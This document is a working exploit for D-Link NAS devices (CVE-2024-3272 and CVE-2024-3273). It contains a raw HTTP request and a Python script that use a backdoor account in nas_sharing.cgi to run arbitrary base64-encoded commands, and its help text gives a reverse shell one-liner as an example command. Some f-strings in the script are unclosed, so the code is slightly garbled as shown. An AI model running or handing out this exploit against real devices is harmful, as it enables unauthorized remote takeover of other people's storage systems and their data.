D-Link-NAS(CVE-2024-3272&&CVE-2024-3273) body="Text:In order to access the ShareCenter"
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/40.0.874.0 Safari/531.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
# Author: Nick Swink (c0rnbread)
# Original post: https://github.com/netsecfish/dlink
# CVE-2024-3272 + CVE-2024-3273
#
# Description: Backdoor Authentication Bypass + Command Injection
# Affected Devices:
# DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
# DNS-325 Version 1.01
# DNS-327L Version 1.09, Version 1.00.0409.2013
# DNS-340L Version 1.08
import requests , argparse , base64
def main (url , command ):
base64_command = base64 .b64encode (command .encode ('utf-8' ))
base64_command = base64_command .decode ('utf-8' )
uri = f"/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={ base64_command }
print ("Sending exploit request to endpoint..." )
print (url + uri )
r = requests .get (url + uri )
if r .status_code == 200 :
print ("Status code: 200" )
print ("Exploit appeared to succeed!" )
print (f"\n \t Printing output: { base64 .b64decode (r .text ).decode ('utf-8' )} )
else :
print ("Status NOT 200" )
print ("Exploit Failed. Exiting..." )
exit ()
if __name__ == "__main__" :
parser = argparse .ArgumentParser (description = "Execute arbitrary command on remote system." )
parser .add_argument ("url" , help = "Base URL of the D-Link web interface. e.g., http://example.com" )
parser .add_argument ("command" , help = "Command to be executed. e.g., /bin/sh -i >& /dev/tcp/localhost/9999 0>&1" )
args = parser .parse_args ()
main (args .url , args .command )